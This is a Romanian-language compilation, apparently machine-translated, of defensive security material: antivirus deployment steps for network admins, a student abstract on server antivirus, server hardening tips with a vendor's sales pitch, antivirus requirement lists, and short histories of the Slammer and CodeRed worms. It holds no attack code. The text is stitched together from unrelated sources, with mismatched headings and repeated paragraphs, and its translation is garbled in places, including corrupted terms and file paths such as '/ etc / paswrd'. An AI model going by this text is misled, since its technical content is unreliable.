  • Site-ul CERT.org conține informații despre vulnerabilitățile în protecția tuturor sistemelor de operare.
  • Rezervați „Firewalls & Internet Security” de William R. Cheswick și Steven M. Bellowin
  • Building Internet Firewalls (ediția a II-a) de Brent Chapman și Elizabeth Zwicky

Rezultat:
Sper că acest articol te-a ajutat să vezi toate problemele împreună, acum administratorul trebuie să citească despre securitatea computerului, baze de date, servere web, limbaje de programare din surse suplimentare. Rezumând scurt articolul, trebuie să fiți la curent cu noutățile despre eliberarea problemelor de securitate, să actualizați și să verificați corectitudinea tuturor datelor de intrare în evoluția dvs.
Fie ca forța să fie cu tine!

Cum să organizați corect apărarea rețelelor de calculatoare împotriva programelor malware.

Articolul se adresează administratorilor de sistem începători.

Prin protecția antivirus, mă refer la protecția împotriva oricărui malware: viruși, troieni, kituri de rădăcină, spații în aer liber, ...

1 Pas pe protecția anti-virus - instalați software antivirus pe fiecare computer din rețea și actualizați-l cel puțin zilnic. Schema corectă pentru actualizarea bazelor de date antivirus: 1-2 servere oferă actualizări și distribuie actualizări la toate computerele din rețea. Asigurați-vă că setați o parolă pentru a dezactiva protecția.

Software-ul antivirus are multe dezavantaje. Dezavantajul principal este că nu prind viruși personalizați care nu sunt utilizați pe scară largă. Al doilea dezavantaj este că acestea încarcă procesorul și preiau memorie pe computere, altele (Kaspersky), altele mai puțin (Eset Nod32), acest lucru trebuie luat în considerare.

Instalarea software-ului antivirus este o modalitate obligatorie, dar insuficientă de protejare împotriva focarelor de virus, deseori semnătura virusului apare în bazele de date antivirus a doua zi după răspândirea sa, iar în termen de 1 zi virusul poate paraliza funcționarea oricărei rețele de calculatoare.

De obicei, administratorii de sistem se opresc la un pas, mai rău, nu îl completează sau nu urmăresc actualizările și, mai devreme sau mai târziu, apare infecția. Mai jos sunt câteva alte măsuri importante de făcut pentru a consolida protecția antivirus.

Pasul 2. Politica de parolă. Virusii (troieni) sunt capabili să infecteze computerele din rețea ghicind parole pentru conturile standard: root, admin, Administrator, Administrator. Utilizați întotdeauna parole complexe! Pentru conturile fără parole sau cu parole simple, administratorul de sistem trebuie respins cu o intrare corespunzătoare în cartea de lucru. După 10 încercări de introducere a parolei greșite, contul trebuie blocat timp de 5 minute pentru a vă proteja împotriva forței brute (ghicirea parolei brute-force). Este foarte recomandat să redenumiți și să blocați conturile de administrator încorporate. Parolele trebuie schimbate periodic.

3 Etapa. Restricția drepturilor utilizatorului. Un virus (troian) se răspândește în rețea în numele utilizatorului care l-a lansat. Dacă utilizatorul are drepturi limitate: nu are acces la alte computere, nu are drepturi administrative la computerul său, nici măcar un virus care rulează nu va putea infecta nimic. Nu este neobișnuit ca administratorii de sistem să devină vinovat în spatele răspândirii virusului: au lansat gena cheie admin și virusul a mers să infecteze toate computerele din rețea ...

4 Etapa. Instalarea regulată a actualizărilor de securitate. Aceasta este o muncă dificilă, dar trebuie făcută. Este necesar să actualizați nu numai sistemul de operare, ci și toate aplicațiile: SGBD, servere de mail.

Pasul 5 Restrângerea modalităților de penetrare a virusurilor. Virusii intră în rețeaua locală a unei întreprinderi în două moduri: prin suporturi amovibile și prin alte rețele (Internet). Negând accesul la USB, CD-DVD, blocați complet o cale. Restrângând accesul la Internet, blocați a 2-a cale. Această metodă este foarte eficientă, dar dificil de implementat.

6 Etapa. Firewalls (ITU), sunt, de asemenea, firewall-uri (firewall-uri), sunt, de asemenea, firewall-uri. Ele trebuie instalate la limitele rețelei. Dacă computerul dvs. este conectat direct la Internet, atunci ITU trebuie să fie pornit. Dacă computerul este conectat doar la o rețea locală (LAN) și se conectează la Internet și la alte rețele prin intermediul serverelor, atunci nu este necesar să porniți ITU pe acest computer.

Pasul 7 Împărțirea unei rețele de întreprinderi în subrețele. Este convenabil să împărțiți rețeaua după principiul: un departament se află într-o subrețea, alt departament este în altul. Rețetele pot fi împărțite la nivel fizic (SCS), la nivelul legăturii de date (VLAN), la nivelul rețelei (subrețelele care nu sunt intersectate de adresele ip).

Pasul 8 Windows are un instrument excelent pentru gestionarea securității grupurilor mari de computere - este Group Policy (GPO). Prin GPO, computerele și serverele pot fi configurate astfel încât infecția și distribuirea programelor malware să devină practic imposibile.

Pasul 9 Accesul terminalului. Configurați 1-2 servere terminale în rețea prin care utilizatorii vor merge pe Internet și probabilitatea de infectare a computerelor personale va scădea la zero.

Pasul 10 Urmărirea tuturor proceselor și serviciilor care rulează pe computere și servere. Vă puteți asigura că atunci când începe un proces (serviciu) necunoscut, administratorul de sistem primește o notificare. Software-ul comercial care poate face acest lucru costă foarte mult, dar în unele cazuri costul este justificat.

Universitatea Chita State Energy Institute Facultatea de Economie și Informatică Departamentul de Informatică Aplicată și Matematică Rezumat pe această temă: Utilizator PC pe această temă: Software antivirus pentru servere Realizat de: art. gr. PI-07-1 Zlova V.V. Verificată: art. Rev. departament PIMMonich I.P. Chita, 2007 Conţinut

Introducere. 3

1 Servere de fișiere ca una dintre sursele de viruși. cinci

2 Software antivirus pentru servere LAN. cinci

3 Software antivirus pentru servere de e-mail. 8

4 Anti-Virus Kaspersky. unsprezece

Concluzie. 17

Lista literaturii folosite .. 18

Introducere Virusurile computerizate sunt astăzi una dintre cele mai periculoase amenințări la adresa securității informațiilor. Un virus informatic este un program scris special, care se poate atașa spontan la alte programe, poate crea copii ale acestuia și le poate insera în fișiere, zone de sistem ale unui computer și rețele de calculatoare pentru a perturba funcționarea programelor, a fișierelor și a directoarelor și a crea tot felul de interferențe cu computerul.

Securitatea informațiilor se referă la securitatea informațiilor și a infrastructurii sale de sprijin din cauza oricăror influențe accidentale sau dăunătoare care pot duce la deteriorarea informațiilor în sine, a proprietarilor sau a infrastructurii de sprijin. Sarcinile de securitate a informațiilor sunt reduse la minimizarea daunelor, precum și la prezicerea și prevenirea acestor impacturi.

Pentru majoritatea organizațiilor, protejarea resurselor rețelei de accesul neautorizat devine una dintre cele mai presante probleme. O preocupare deosebită este faptul că Internetul este acum utilizat pe scară largă pentru transportul și stocarea de date și informații corporative confidențiale.

Sarcina protejării informațiilor este deosebit de relevantă pentru proprietarii bazelor de date de informații online, editorii de reviste electronice etc.

Până în prezent, multe programe antivirus au fost create pentru combaterea virusurilor.Programul antivirus (antivirus) este inițial un program pentru detectarea și tratarea programelor infectate cu un virus de calculator, precum și pentru prevenirea infecției unui fișier cu un virus (de exemplu, prin vaccinare). Multe antivirusuri moderne pot detecta și elimina troienii și alte programe dăunătoare. Software-ul antivirus constă în programe de calculator care încearcă să detecteze, să prevină și să elimine virușii computerului și alte programe malware. în activitatea computerului. Serverele de fișiere și mail sunt acum instrumentul principal pentru gestionarea datelor. Stocarea, schimbul și transmiterea de date sunt principalele sarcini ale unui astfel de management, dar acestea sunt imposibile fără acces facil la informații, integrarea datelor și stabilitatea sistemului. Serverul de fișiere este una dintre cele mai vulnerabile resurse de rețea. În caz de infecție sau defecțiune, accesul la alte resurse de rețea poate fi limitat. Un singur fișier infectat poate duce la infecția unei cantități mari de date, pierderea integrării datelor și defecțiuni ale sistemului. Aceste riscuri contribuie la costul ridicat al produselor de gestionare a serverului și a rețelei. Serverele de fișiere „publice” și conferințele electronice sunt una dintre principalele surse de viruși. Aproape în fiecare săptămână, se primește un mesaj potrivit căruia un utilizator și-a infectat computerul cu un virus care a fost eliminat de pe un server BBS, ftp sau de la o conferință electronică. În același timp, adesea fișierele infectate sunt „puse” de autorul virusului pe mai multe BBS / ftp sau trimise simultan la mai multe conferințe, iar aceste fișiere sunt deghizate în versiuni noi ale unui software (uneori - sub versiuni noi de software antivirus). În cazul unei distribuții în masă a unui virus pe serverele de fișiere ftp / BBS, mii de computere pot fi infectate aproape simultan, dar în majoritatea cazurilor virusurile DOS sau Windows sunt „plantate”, a căror răspândire în condiții moderne este mult mai lentă decât virușii macro. Din acest motiv, astfel de incidente nu se termină aproape niciodată în epidemii în masă, ceea ce nu se poate spune despre virusurile macro. 2 Software antivirus pentru servere LAN Problemele protecției antivirus eficiente sunt mai relevante ca niciodată în sectorul corporativ și în rândul utilizatorilor privați, însă, spre deosebire de acestea din urmă, problemele și sarcinile cu care se confruntă companiile sunt mult mai grave și necesită soluții la un nivel diferit. Administratorii sistemelor de informații corporative trebuie să instaleze instrumente antivirus, să le configureze și să configureze politicile de actualizare și să se asigure că antivirusurile sunt activate constant pe sute sau chiar mii de mașini - și deseori trebuie să facă toate acestea manual. Rețelele locale sunt una dintre principalele surse de viruși. Dacă nu luați măsurile de protecție necesare, stația de lucru infectată infectează unul sau mai multe fișiere de serviciu pe server (în cazul Novell NetWare, LOGIN.COM) atunci când intră în rețea. A doua zi, utilizatorii lansează fișiere infectate atunci când se conectează la rețea. În loc de fișierul de serviciu LOGIN.COM, pot fi, de asemenea, instalate diverse programe software pe server, documente-șabloane standard sau tabele Excel utilizate în companie.

Pericolul de infecție în rețelele de calculatoare este real pentru orice întreprindere, dar în rețelele locale ale complexelor economice și industriale mari cu o infrastructură extinsă din punct de vedere geografic se poate dezvolta o epidemie virală. Rețelele lor de calculatoare, de regulă, au fost create în etape, folosind diverse hardware și software. Este evident că pentru astfel de întreprinderi problema protecției antivirus devine foarte dificilă, nu numai din punct de vedere tehnic, ci și din punct de vedere financiar.

În același timp, soluția acestei probleme este obținută printr-o combinație de măsuri organizaționale și soluții software și hardware. Această abordare nu necesită costuri financiare mari și imediate și poate fi utilizată pentru protecția antivirus globală a rețelei locale a oricărei întreprinderi.

Următoarele principii pot fi utilizate ca bază pentru construirea unui astfel de sistem de protecție antivirus:

Principiul implementării unei politici tehnice unificate atunci când se justifică alegerea produselor antivirus pentru diverse segmente ale rețelei locale;

Principiul completității acoperirii întregii rețele locale a organizației de către sistemul de protecție antivirus;

Principiul controlului continuu al rețelei locale a unei întreprinderi, pentru detectarea la timp a unei infecții computerizate;

Principiul managementului centralizat al protecției antivirus;

Principiul implementării unei politici tehnice unificate prevede utilizarea numai a programelor antivirus recomandate de divizia de protecție anti-virus a întreprinderii în toate segmentele rețelei locale. Această politică are un caracter de lungă durată, aprobată de conducerea companiei și constituie baza pentru planificarea orientată și pe termen lung a costurilor pentru achiziționarea de produse software antivirus și actualizările ulterioare ale acestora.

Principiul completității acoperirii de către sistemul de protecție antivirus din rețeaua locală prevede introducerea treptată a software-ului de protecție antivirus în rețea până la saturație completă, în combinație cu măsurile organizatorice și de regim ale protecției informațiilor.

Principiul monitorizării continue a stării antivirus a unei rețele locale implică o astfel de organizare a protecției sale, care oferă o capacitate constantă de a monitoriza starea rețelei pentru a detecta viruși.

Principiul gestionării centralizate a protecției antivirus prevede gestionarea sistemului de la o autoritate folosind hardware și software. Acest organism este cel care organizează controlul centralizat în rețea, primește date de control sau rapoarte de la utilizatori de la locurile de muncă privind detectarea virușilor și asigură implementarea soluțiilor adoptate pentru gestionarea sistemului de protecție antivirus. Protecția antivirus a rețelei locale a unei organizații mari este o problemă complexă care nu se limitează la o simplă instalare de antivirus produse. De regulă, este necesară crearea unui subsistem separat. În termeni tehnici, atunci când rezolvați această problemă, trebuie acordată o atenție deosebită testării tuturor programelor anti-virus recent achiziționate, precum și instalării pachetelor antivirus pe serverele de poștă. 3 Software antivirus pentru servere de e-mail

Dacă în zorii dezvoltării tehnologiei informatice, principalul canal pentru răspândirea virușilor a fost schimbul de fișiere de programe prin dischete, astăzi palma aparține e-mailului. Email-ul este un mijloc convenabil și de neînlocuit de comunicare de afaceri. Cu toate acestea, majoritatea virușilor și a spamului sunt răspândite prin e-mail; acesta poate fi un canal pentru scurgerea datelor confidențiale. În fiecare zi, milioane și milioane de mesaje sunt transmise prin canalele sale, iar multe dintre aceste mesaje sunt infectate cu viruși.

Din păcate, fișierele de atașament trimise cu mesaje de e-mail pot fi, de asemenea, extrem de periculoase pentru sănătatea computerului. Care sunt pericolele fișierelor de atașare? Ca un astfel de fișier, utilizatorului i se poate trimite un virus sau un cal troian sau un document în format Microsoft Office (* .doc, * .xls) infectat cu un virus al calculatorului. Prin rularea programului rezultat pentru executare sau prin deschiderea unui document pentru vizualizare, utilizatorul poate iniția un virus sau instala un program troian pe computerul său. Mai mult, datorită setărilor incorecte ale programului de e-mail sau erorilor din acesta, fișierele de atașare se pot deschide automat atunci când vizualizați conținutul scrisorilor primite. În acest caz, dacă nu luați nicio măsură de protecție, va fi o problemă de timp ca virușii sau alte programe malware să intre pe computer. De exemplu, pot trimite un mesaj sub forma unui document HTML în care este încorporat un control Trojan ActiveX. După ce ați deschis un astfel de mesaj, puteți descărca acest element pe computerul dvs., după care va începe imediat să își facă treaba. E-mail troian - troieni care vă permit să „trageți” parolele și alte informații din fișierele computerului dvs. și să le trimiteți prin e-mail către proprietar. Acestea pot fi autentificările și parolele Internet ale furnizorului, parola pentru căsuța poștală, parolele ICQ și IRC, etc. Pentru a trimite o scrisoare proprietarului prin poștă, troianul contactează serverul de poștă al site-ului utilizând protocolul SMTP (de exemplu, la smtp.mail.ru). După colectarea datelor necesare, troianul va verifica dacă datele au fost trimise. Dacă nu, datele sunt trimise și stocate în registru. Dacă au fost deja trimise, atunci scrisoarea anterioară este extrasă din registru și este comparată cu cea actuală. Dacă au existat modificări în informații (au apărut date noi), atunci scrisoarea este trimisă și date noi despre parolele sunt înregistrate în registru. Pe scurt, acest tip de troian este doar colectarea de informații, iar victima poate chiar nu ghicește că parolele sale sunt deja cunoscute de cineva. Arhiva unui astfel de troian conține de obicei 4 fișiere: un editor de server (configurator), un server troian, un pachet (gluer) fișiere, un manual de utilizare. Ca urmare a lucrării, se pot determina următoarele date: 1) adresa IP a computerului victimei; 2) informații detaliate despre sistem (numele computerului și numele de utilizator, versiunea Windows, modem, etc.); 3) toate parolele din cache ; 4) toate setările conexiunilor telefonice, inclusiv numere de telefon, autentificări și parole; 5) parole de la ICQ; 6) numărul ultimelor site-uri vizitate. Pe lângă măsurile pur administrative, trebuie să se folosească un software antivirus special (antivirus) pentru combaterea virușilor și a altor programe dăunătoare.Pentru a vă proteja împotriva virușilor care se răspândesc prin e-mail, puteți instala antivirusuri pe computerele expeditorului și destinatarului. Cu toate acestea, această protecție este adesea insuficientă. Antivirusurile convenționale instalate pe computerele utilizatorilor de internet sunt concepute pentru a scana fișiere și nu știu întotdeauna să analizeze traficul prin e-mail. Dacă antivirusul nu scanează automat toate fișierele care sunt deschise, atunci un virus sau un cal troian poate pătrunde cu ușurință protecția pe discul computerului.În plus, eficacitatea antivirusurilor depinde foarte mult de respectarea regulilor de utilizare a acestora: este necesar să actualizați periodic baza de date antivirus, să utilizați setările corecte ale scanerului antivirus etc. Din păcate, mulți proprietari de computere nu știu să folosească corect software-ul antivirus sau nu actualizează baza de date antivirus, ceea ce duce inevitabil la infecții cu virus.Înțelegând urgența problemei răspândirii virusurilor prin e-mail, multe companii oferă programe antivirus speciale pentru protejarea serverelor de poștă. Astfel de antivirus analizează fluxul de date care trece prin serverul de poștă, împiedicând transmiterea mesajelor cu fișierele de atașare infectate. Există o altă soluție - conectarea la serverele de poștă a antivirusurilor convenționale concepute pentru scanarea fișierelor.Protecția antivirus a serverelor de poștă SMTP și POP3 este mult mai eficientă decât protecția antivirus a computerelor utilizatorilor. De regulă, un administrator cu experiență configurează antivirusuri pe server, care nu vor face greșeli la configurare și, în plus, vor activa modul de actualizare automată a bazei de date prin Internet. Utilizatorii de servere SMTP și POP3 sigure nu trebuie să se îngrijoreze de canalul principal de distribuție a virușilor - vor primi mesaje care au fost deja curățate de viruși. De exemplu, când un expeditor încearcă să trimită un mesaj cu un fișier infectat, serverul de mail sigur SMTP îl va refuza, iar programul de poștă va afișa un mesaj de avertizare; dacă cineva trimite un e-mail cu un fișier atașat la adresa dvs., atunci utilizează serverul POP3 securizat în schimb, veți primi doar un mesaj despre detectarea unui virus. În ciuda popularității în continuă creștere a platformei Microsoft Windows, majoritatea serverelor de internet rulează astăzi Linux, FreeBSD și sisteme similare UNIX. Principalul avantaj al Linux este costul său foarte mic de achiziție. Oricine poate descărca o distribuție Linux pe Internet și o poate instala pe orice număr de calculatoare. Această distribuție are tot ce ai nevoie pentru a crea un site Internet, inclusiv servere de e-mail. Alte avantaje ale Linux și sisteme de operare similare includ deschiderea, disponibilitatea codurilor sursă, prezența unei comunități uriașe de dezvoltatori voluntari care sunt gata să ajute în situații dificile, simplu. telecomandă folosind o consolă de text etc. Doar câteva zeci de viruși au fost creați pentru sistemul de operare al acestei serii, ceea ce indică o securitate ridicată.

4 Anti-Virus Kaspersky

Este imposibil să protejați serverul de accesul extern o dată pentru totdeauna, deoarece în fiecare zi sunt descoperite noi vulnerabilități și apar noi modalități de a pirata serverul. Vom vorbi despre protejarea serverelor împotriva accesului neautorizat în acest articol.

Serverele oricărei companii pot deveni mai devreme sau mai târziu o țintă pentru hacking sau atacuri de virus. În mod obișnuit, rezultatul unui astfel de atac este pierderea de date, prejudiciul reputațional sau financiar, deci securitatea serverului ar trebui luată în considerare mai întâi.

Trebuie înțeles că protecția împotriva piratării serverului este un set de măsuri, inclusiv cea care implică o monitorizare constantă a funcționării serverului și lucrează pentru îmbunătățirea protecției. Este imposibil să protejați serverul de accesul extern o dată pentru totdeauna, deoarece în fiecare zi sunt descoperite noi vulnerabilități și apar noi modalități de a pirata serverul.

Vom vorbi despre protejarea serverelor împotriva accesului neautorizat în acest articol.

Modalități și metode de protejare a serverelor împotriva accesului neautorizat

Protecția serverului fizic

Protecție fizică. Este de dorit ca serverul să fie situat într-un centru de date securizat, o cameră închisă și păzită, persoanele din afară nu ar trebui să aibă acces la server.

Configurați autentificarea SSH

Când configurați accesul la server, utilizați autentificarea cheii SSH în loc de parolă, deoarece aceste chei sunt mult mai dificile și uneori pur și simplu imposibil de fisurat folosind o enumerare de opțiuni.

Dacă credeți că mai aveți nevoie de o parolă, asigurați-vă că limitați numărul de încercări de a o introduce.

Rețineți dacă vedeți un mesaj ca acesta la conectare:

Ultima autentificare eșuată: mar 28 sept. 12:42:35 MSK 2017 din 52.15.194.10 pe ssh: notty
Au fost 8243 încercări de autentificare eșuate de la ultima autentificare reușită.

Poate indica faptul că cineva a încercat să îți pirateze serverul. În acest caz, pentru a configura securitatea serverului, modificați portul SSH, limitați lista de IP-uri din care este posibil accesul la server sau instalați software care blochează automat o activitate excesiv de frecventă și suspectă.

Instalați cele mai recente actualizări în mod regulat

Pentru a asigura protecția serverului, instalați cele mai recente corecții și actualizări pe software-ul serverului pe care îl utilizați - sistemul de operare, ipervizorul, serverul de baze de date la timp.

Este recomandabil să verificați patch-uri noi, actualizări și bug-uri / vulnerabilități raportate în fiecare zi pentru a preveni atacurile care exploatează vulnerabilitățile din ziua zero. Pentru a face acest lucru, abonați-vă la știri de la compania de dezvoltare software, urmați paginile sale pe rețelele de socializare.

Protejați parolele

Până acum, una dintre cele mai frecvente modalități de a obține acces la server este prin fisurarea parolei serverului. Prin urmare, respectă recomandările cunoscute, dar cu toate acestea, relevante pentru a nu lăsa serverul neprotejat:

  • nu folosiți parole ușor de ghicit, cum ar fi numele companiei.
  • dacă tot utilizați parola implicită pentru consola de admin, modificați-o imediat;
  • parolele pentru diferite servicii trebuie să fie diferite;
  • dacă aveți nevoie pentru a transfera parola către cineva, nu trimiteți niciodată adresa IP, numele de utilizator și parola în aceeași scrisoare sau mesaj în mesagerie;
  • puteți configura verificarea în doi pași pentru a vă autentifica în contul de administrator.

Firewall

  • Asigurați-vă că serverul este acolo, configurat și rulat tot timpul.
  • Protejați traficul de intrare și de ieșire.
  • Urmăriți porturile deschise și în ce scopuri, nu deschideți nimic inutil pentru a reduce numărul de vulnerabilități posibile pentru hackingul serverului.

În special, firewallul este foarte util în protejarea serverului împotriva atacurilor ddos, deoarece puteți crea rapid reguli de interzicere a firewallului și să introduceți în ele adresele IP de la care are loc atacul sau să blocați accesul la anumite aplicații folosind anumite protocoale.

Monitorizarea și detectarea intruziunilor

  • Limitați software-ul și serviciile care rulează pe serverul dvs. Verificați periodic tot ce aveți în derulare și dacă găsiți vreun proces necunoscut, ștergeți-le imediat și începeți să verificați virușii.
  • Verificați periodic dacă există semne de falsificare. Conturile de utilizator noi pe care nu le-ați creat, mutarea sau ștergerea unui fișier pot indica o încălcare /etc/syslog.conf, fișiere șterse / etc / shadow și / etc / paswrd.
  • Monitorizați funcționarea serverului dvs., urmăriți viteza și lățimea de bandă normală, astfel încât să observați abateri, de exemplu, când încărcarea pe server a devenit semnificativ mai mare decât de obicei.

Utilizarea criptării VPN și SSL / TLS

Dacă este necesar acces la distanță la server, acesta trebuie permis numai de la anumite adrese IP și trebuie făcut prin VPN.

Următorul pas în asigurarea securității poate fi configurarea SSL, care nu numai că criptează datele, dar și verifică identitatea celorlalți participanți la infrastructura de rețea, emitându-le certificate adecvate.

Verificarea securității serverului

Ar fi o idee bună să verificați în mod independent securitatea serverului folosind metoda pentest, adică. simulare de atac pentru a găsi potențiale vulnerabilități și pentru a le elimina în timp. Este recomandabil să se implice specialiști în securitatea informațiilor în acest sens, totuși, unele teste pot fi efectuate independent, folosind programe pentru serverele de hacking.

Ce altceva amenință serverele în afară de hacking

Serverul poate eșua din mai multe alte motive, în afară de hacking. De exemplu, poate fi o infecție malware sau doar o defecțiune fizică a oricăreia dintre componente.

Prin urmare, măsurile de protecție a serverului ar trebui să includă:

  • Instalarea și actualizarea programelor pentru protejarea serverului - antivirus.
  • Copii criptate obișnuite de date, cel puțin o dată pe săptămână, deoarece, conform statisticilor, hard disk-urile serverului sunt pe primul loc în ceea ce privește rata de eșec. Asigurați-vă că copia de rezervă este stocată într-un mediu securizat fizic.
  • Furnizarea de alimentare neîntreruptă în camera serverului.
  • Prevenirea fizică la timp a serverelor, inclusiv curățarea lor de praf și înlocuirea pastei termice.

Experiența specialiștilor Integrus ne spune că cea mai bună protecție împotriva unor astfel de amenințări este aplicarea celor mai bune practici în domeniul sistemelor de protecție a serverului.

Pentru a asigura securitatea serverelor clienților noștri, folosim o combinație de instrumente: firewall-uri, antivirusuri, tehnologii de securitate / gestionare a evenimentelor (SIM / SEM), tehnologii de detectare / protecție a intruziunilor (IDS / IPS), tehnologii de analiză comportamentală a rețelei (NBA), desigur, întreținere preventivă periodică. servere și aranjarea camerelor de securitate pentru server la cheie. Acest lucru vă permite să reduceți la minimum riscurile de hacking sau eșec al serverului din alte motive.

Suntem pregătiți să audităm securitatea serverelor companiei dvs., să consultați specialiști, să efectuați toate tipurile de lucrări pentru configurarea echipamentelor de server.

Pe baza raționamentelor și exemplelor de mai sus, putem formula cerințele de bază pentru antivirus pentru stațiile de lucru. Este clar că aceste cerințe vor diferi pentru stațiile de lucru din clase diferite.

Cerințe antivirus pentru stațiile de lucru Windows

Ca și până acum, cerințele vor fi împărțite în mai multe categorii:

  1. Cerințe generale - fiabilitate, performanță, ușurință în utilizare, ieftinire - nu are rost să vă repetați din nou
  2. Cerințe primare - ca urmare a sarcinii principale:
    • Scanarea tuturor fișierelor de pe discurile locale accesate - pentru citire, scriere, lansare - pentru a identifica și neutraliza virușii computerului
    • Verificarea unităților amovibile și de rețea
    • Verificare memorie
    • Verificarea scrisorilor de intrare și de ieșire pentru viruși, atât mesajele în sine, cât și atașamentele lor ar trebui să fie verificate
    • Verificarea scripturilor și a altor elemente active ale paginilor web
    • Verificarea macro-urilor din documentele Microsoft Office și fișierele altor aplicații
    • Scanarea fișierelor compuse - arhive, arhive cu auto-extragere, fișiere executabile la pachet, baze de date de poștă, fișiere în format poștal, containere OLE
    • Posibilitatea de a selecta diferite acțiuni asupra fișierelor infectate, în mod normal:
      • blocare (când verificați în timp real)
      • jurnalizare (scanare la cerere)
      • ștergere
      • trecând la carantină
      • tratament
      • solicitarea unei acțiuni de la utilizator
    • Tratamentul fișierelor infectate
    • Curățarea fișierelor infectate în arhive
    • De dorit - detectarea programelor potențial nedorite (module adware și spyware, instrumente hacker etc.)
  3. Cerințe de management
    • Interfață grafică locală
    • Capacitate de gestionare la distanță și centralizată (versiunea corporativă)
    • Posibilitatea de a programa lansarea sarcinilor de scanare și actualizare
    • Posibilitatea de a lansa orice sarcină sau de a efectua orice acțiune la cerere (manual)
    • Posibilitatea de a restricționa acțiunile unui utilizator neprivilejat în raport cu complexul antivirus
  4. Cerințe de upgrade
    • Asistență pentru diverse surse de actualizare, standard:
      • Resursă HTTP sau FTP
      • Dosarul local sau de rețea
      • Sistem de actualizare centralizat (în versiuni corporative)
    • Posibilitatea de a actualiza bazele de date antivirus, motorul anti-virus și modulele de aplicație
    • Posibilitatea de a efectua actualizări manuale la cerere sau automat în cadrul unui program
    • Posibilitatea de a derula actualizările bazei de date antivirus
  5. Cerințe de diagnostic
    • Notificarea utilizatorului local despre evenimente importante - detectarea virusului, modificarea stării antivirusului etc.
    • Păstrarea jurnalelor de antivirus și / sau sarcini individuale
    • Notificarea administratorului de securitate antivirus (în versiunea corporativă)
Cerințe antivirus pentru stațiile de lucru Linux / Unix
  1. Cerințe generale - practic neschimbat: fiabilitate, performanță, cost redus. Utilizabilitatea în sistemele Unix este evaluată în mod tradițional după criterii ușor diferite decât în \u200b\u200bsistemele Windows, deși această stare de lucruri începe treptat să se schimbe spre unificarea cerințelor
  2. Cerințe primare - pe baza scopului:
    • Scanarea la cerere a fișierelor și a directoarelor arbitrare pentru viruși
    • Este de dorit, dar nu critic, să scanați anumite directoare în timp real când accesați fișiere. Dacă o astfel de funcționalitate este într-adevăr necesară, atunci vorbim nu atât despre o stație de lucru, cât despre un server - în sistemele Unix nu există nicio diferență evidentă între ele.
    • Detectarea virușilor în obiecte compuse - arhive, arhive de auto-extragere, module executabile la pachet, baze de date post, fișiere cu format poștal, containere OLE - nu se limitează la formate comune în mediul Unix
    • Posibilitatea de a selecta o acțiune la detectarea fișierelor infectate, de obicei:
      • șterge
      • mutați sau redenumiți
      • a vindeca
      • scrie informații într-un raport
      • solicitați utilizatorului acțiune (atunci când se verifică la cerere)
    • Tratamentul fișierelor infectate
    • De dorit - posibilitatea tratamentului în arhive
  3. Cerințe de management
    • Management local prin editarea fișierelor de configurare
    • De dorit - telecomandă prin interfața web
    • Posibilitatea de a planifica lansarea sarcinilor și executarea acțiunilor
    • Abilitatea de a efectua sarcini și acțiuni manual
  4. Cerințe de diagnostic
    • Păstrarea jurnalelor de lucru
    • Notificare pentru administratorul securității anti-virus

Protecție server

În general protecție antivirus serverele nu sunt la fel de diferite de protecția stațiilor de lucru, precum de protecția gateway-ului. Principalele amenințări și tehnologii pentru combaterea acestora rămân aceleași - doar accentele sunt schimbate.

Serverele de rețea, precum stațiile de lucru, sunt în mod natural împărțite în clase, în funcție de sistemele de operare utilizate:

  • Servere Windows
  • Servere Novell Netware
  • Servere Unix

Principiul diviziunii se datorează amenințărilor cu virus caracteristice diferitelor sisteme de operare și, ca urmare, a diferitelor opțiuni în definirea sarcinii principale a antivirusului.

În cazul produselor de protecție a serverului, nu există diviziune în produse personale și de rețea - toate produsele sunt de rețea (corporative). Mulți producători nu au nici măcar o diviziune a produselor corporative în cele destinate stațiilor de lucru și serverelor de fișiere - au un singur produs.

Amenințări și contramăsuri specifice

Toate amenințările specifice serverului sunt asociate nu atât cu caracteristicile sistemelor de operare ale serverului, cât și cu utilizarea de software vulnerabil tipic pentru servere.

Servere Microsoft Windows

Pentru serverele Windows, toate aceleași amenințări sunt relevante ca pentru stațiile de lucru sub Windows NT / 2000 / XP. Singurele diferențe sunt în modul predominant de operare a serverelor, ceea ce duce la o serie de atacuri suplimentare care nu sunt tipice pentru stațiile de lucru.

Așadar, utilizatorii funcționează rar în spatele serverelor Windows, ceea ce înseamnă că clienții de poștă și aplicațiile de birou de pe servere nu sunt de obicei utilizate. Drept urmare, cerințele pentru protecția poștală la nivelul clientului de poștă și mijloacele suplimentare de detectare a virușilor macro sunt mai puțin solicitate în cazul serverelor Windows.

Exemplu... Spre deosebire de Kaspersky Anti-Virus pentru Windows Workstations, Kaspersky Anti-Virus pentru Windows File Servers nu are un modul pentru analiza comportamentală a macro-urilor executate atunci când lucrați cu documente Microsoft Office și un modul pentru scanarea e-mailurilor primite. Acest lucru nu înseamnă că produsul nu are protecție împotriva virușilor macro și a viermilor de poștă - așa cum s-a menționat deja, la final, toate fișierele deschise sunt verificate de modulul de protecție în timp real a sistemului de fișiere - doar că specificul funcționării serverului nu necesită protecție suplimentară, așa cum s-a întâmplat în cazul lucrătorilor. stații.

Pe de altă parte, servicii precum Microsoft SQL Server și Microsoft IIS pot fi utilizate mult mai des pe serverele Windows decât în \u200b\u200bstațiile de lucru. La fel ca sistemele de operare realizate de Microsoft (și nu numai de Microsoft), aceste servicii pot conține vulnerabilități, care au fost utilizate de autorii de virus de mai multe ori în timpul lor.

Exemplu... În 2003, viermele Net-Worm .Win32.Slammer a apărut și s-a aruncat literalmente pe Internet, exploatând o vulnerabilitate în Microsoft SQL Server 2000. Slammer nu și-a salvat fișierele pe disc, ci a fost executat direct în spațiul de adrese al aplicației SQL Server. Viermele a atacat apoi adrese IP aleatoare din rețea într-o buclă nesfârșită, încercând să exploateze aceeași vulnerabilitate de a se infiltra. Ca urmare a activității viermei, serverele și canalele de comunicare pe Internet au fost atât de supraîncărcate încât întregi segmente ale rețelei erau inaccesibile. Coreea de Sud a fost afectată în special de epidemie. Trebuie menționat că viermele nu a efectuat alte acțiuni în afară de reproducere.

Exemplu... Chiar și mai devreme, în 2001, o vulnerabilitate în Microsoft IIS 5.0 a fost exploatată pentru a fi răspândită de viermele NetWorm .Win32. CodeRed .a. Consecințele epidemiei nu au fost la fel de impresionante ca în cazul viermului Slammer, dar cu ajutorul calculatoarelor infectate cu CodeRed .a, pe site-ul web al Casei Albe din SUA (www.whitehouse.gov) a fost făcută o încercare de succes DDoS. CodeRed .a nu a salvat fișierele pe discurile serverelor infectate.

